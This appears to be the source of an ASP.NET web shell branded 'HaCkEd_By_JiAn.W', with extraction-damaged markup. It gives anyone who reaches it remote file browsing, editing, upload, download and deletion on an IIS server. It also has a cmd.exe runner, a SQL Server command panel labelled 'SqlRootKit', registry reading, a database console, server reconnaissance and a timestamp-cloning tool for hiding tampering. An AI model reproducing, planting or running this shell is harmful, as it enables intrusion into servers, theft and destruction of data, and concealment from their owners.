<%@ Page Language="VB" ContentType="text/html" validateRequest="false" aspcompat="true" %> <%@ Import Namespace="System.IO" %> <%@ import namespace="System.Diagnostics" %> <%@ Import Namespace="Microsoft.Win32" %> <%@ Import Namespace="System.Data" %> <%@ Import Namespace="System.Data.OleDb" %> <% if request.QueryString("action")="down" and session("lake2")=1 then downTheFile(request.QueryString("src")) response.End() end if Dim hu as string = request.QueryString("action") if hu="cmd" then TITLE="HaCkEd_By_JiAn.W -- CMD" elseif hu="sqlrootkit" then TITLE="HaCkEd_By_JiAn.W -- SqlRootKit" elseif hu="clonetime" then TITLE="HaCkEd_By_JiAn.W -- CloneTime" elseif hu="information" then TITLE="HaCkEd_By_JiAn.W -- WebServerInfo" elseif hu="reg" then TITLE="HaCkEd_By_JiAn.W -- RegRead" elseif hu="goto" then TITLE="HaCkEd_By_JiAn.W -- FileManager" elseif hu="data" then TITLE="HaCkEd_By_JiAn.W -- ControlDataBase" else TITLE=request.ServerVariables("HTTP_HOST") end if %> <%=TITLE%> <% Dim error_x as Exception Try if session("lake2")<>1 then %>
 8管理登录 :::... HaCkEd_By_JiAn.W
<% else dim temp as string temp=request.QueryString("action") if temp="" then temp="goto" select case temp case "goto" if request.QueryString("src")<>"" then url=request.QueryString("src") else url=server.MapPath(".") & "\" end if call existdir(url) dim xdir as directoryinfo dim mydir as new DirectoryInfo(url) dim hupo as string dim xfile as fileinfo %>
SqlRootKit.NET    CMD.NET   CloneTime   SysInfomation   ReadReg   DataBase Powered By 娇娘 r 
当前目录:<%=url%>
新建 <%if session("cutboard")<>"" then%> 粘贴 <%else%> 粘贴 <%end if%> 上传 title="回到本文件所在目录">我 <% dim i as integer for i =0 to Directory.GetLogicalDrives().length-1 response.Write("" & Directory.GetLogicalDrives(i) & " ") next %>
<% '子目录结构 response.Write("") for each xdir in mydir.getdirectories() dim filepath as string filepath=server.UrlEncode(url & xdir.name) response.Write("") next %>
↑回上级目录
0" & xdir.name & "") response.Write("
" & Directory.GetLastWriteTime(url & xdir.name) & "剪切" & "-复制-删除
 <% '文件结构 for each xfile in mydir.getfiles() dim filepath2 as string filepath2=server.UrlEncode(url & xfile.name) response.Write("") response.Write("") response.Write("") response.Write("") next %>
名称 大小 修改时间 操作
" & xfile.name & "" & GetSize(xfile.length) & "" & file.GetLastWriteTime(url & xfile.name) & "编辑-剪切-粘贴-重命名-下载-删除
<% case "information"'探针功能 dim CIP,CP as string if getIP()<>request.ServerVariables("REMOTE_ADDR") then CIP=getIP() CP=request.ServerVariables("REMOTE_ADDR") else CIP=request.ServerVariables("REMOTE_ADDR") CP="None" end if %>
探针
Server IP
    <%=request.ServerVariables("LOCAL_ADDR")%>
Machine Name
    <%=Environment.MachineName%>
Network Name
    <%=Environment.UserDomainName.ToString()%>
User Name in this Process
    <%=Environment.UserName%>
OS Version
    <%=Environment.OSVersion.ToString()%>
Started Time
    <%=GetStartedTime(Environment.Tickcount)%> Hours
System Time
    <%=now%>
IIS Version
    <%=request.ServerVariables("SERVER_SOFTWARE")%>
HTTPS
    <%=request.ServerVariables("HTTPS")%>
PATH_INFO
    <%=request.ServerVariables("PATH_INFO")%>
PATH_TRANSLATED
    <%=request.ServerVariables("PATH_TRANSLATED")%>
SERVER_PORT
    <%=request.ServerVariables("SERVER_PORT")%>
SeesionID
    <%=Session.SessionID%>
Client Infomation
Client Proxy
    <%=CP%>
Client IP
    <%=CIP%>
User
    <%=request.ServerVariables("HTTP_USER_AGENT")%>
<% case "cmd" 'CMD.NET%>
CMD.NET
CMD.exe's Path:
Command:
<% case "sqlrootkit" 'SqlRootKit.NET%>
SqlRootKit.NET
Host:
SQL Name:
SQL Password:
Command:
<% case "del" dim a as string a=request.QueryString("src") call existdir(a) call del(a) response.Write("") case "copy" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("") case "cut" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("") case "plaster" dim ow as integer if request.Form("OverWrite")<>"" then ow=1 if request.Form("Cancel")<>"" then ow=2 url=request.QueryString("src") call existdir(url) dim d as string d=session("cutboard") if left(d,1)="" then TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & replace(path.getfilename(d),"","") if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.move(replace(d,"",""),TEMP1 & "\") response.Write("") else call xexistdir(TEMP2,ow) file.move(replace(d,"",""),TEMP2) response.Write("") end if else TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & path.getfilename(replace(d,"","")) if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.createdirectory(TEMP1) call copydir(replace(d,"",""),TEMP1 & "\") response.Write("") else call xexistdir(TEMP2,ow) file.copy(replace(d,"",""),TEMP2) response.Write("") end if end if case "upfile" url=request.QueryString("src") %>
<%=url%>
<% case "new" url=request.QueryString("src") %>
<%=url%>
文件名称:
<% case "edit" dim b as string b=request.QueryString("src") call existdir(b) dim myread as new streamreader(b,encoding.default) filepath.text=b content.text=myread.readtoend %>
文件编辑
<% myread.close case "rename" url=request.QueryString("src") if request.Form("name")="" then %>
重命名
" onSubmit="return checkname();">
    <%=request.QueryString("src")%>
    <%=getparentdir(request.QueryString("src"))%>
<% else if Rename() then response.Write("") else response.Write("") end if end if case "samename" url=request.QueryString("src") %>
存在同名文件,如果你选NO,将自动添加一个数字前缀
返回 <% case "clonetime"'CloneTime time1.Text=request.QueryString("src")&"51j.aspx" time2.Text=request.QueryString("src") %>
文件日期修改
自己
目标
<% case "reg"'ReadReg %>
注册表操作
Key :
Value:
<% case "data" 'DataBase%>
数据库操作
Connection String :
Select Database:
<% case "logout" session.Abandon() response.Write("